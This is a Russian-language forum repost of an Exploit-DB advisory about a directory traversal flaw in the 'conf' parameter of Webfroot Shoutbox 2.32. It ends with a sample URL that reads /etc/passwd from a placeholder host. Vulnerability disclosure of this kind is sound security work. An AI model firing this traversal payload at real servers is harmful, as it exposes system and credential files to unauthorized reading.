Exploit Webfroot Shoutbox 2.32 - 'URI' File Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
22671
Проверка EDB
  1. Пройдено
Автор
POKLEYZZ
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2003-05-29
Код:
source: https://www.securityfocus.com/bid/7737/info

Shoutbox is prone to directory traversal attacks. The vulnerability exists due to insufficient sanitization of user-supplied values to URI parameters.

An attacker can exploit this vulnerability by manipulating the value of the affected 'conf' URI parameter to obtain any files readable by the web server.

http://blablabla.com/shoutbox.php?conf=../../../../../../../etc/passwd
 
Источник
www.exploit-db.com

Похожие темы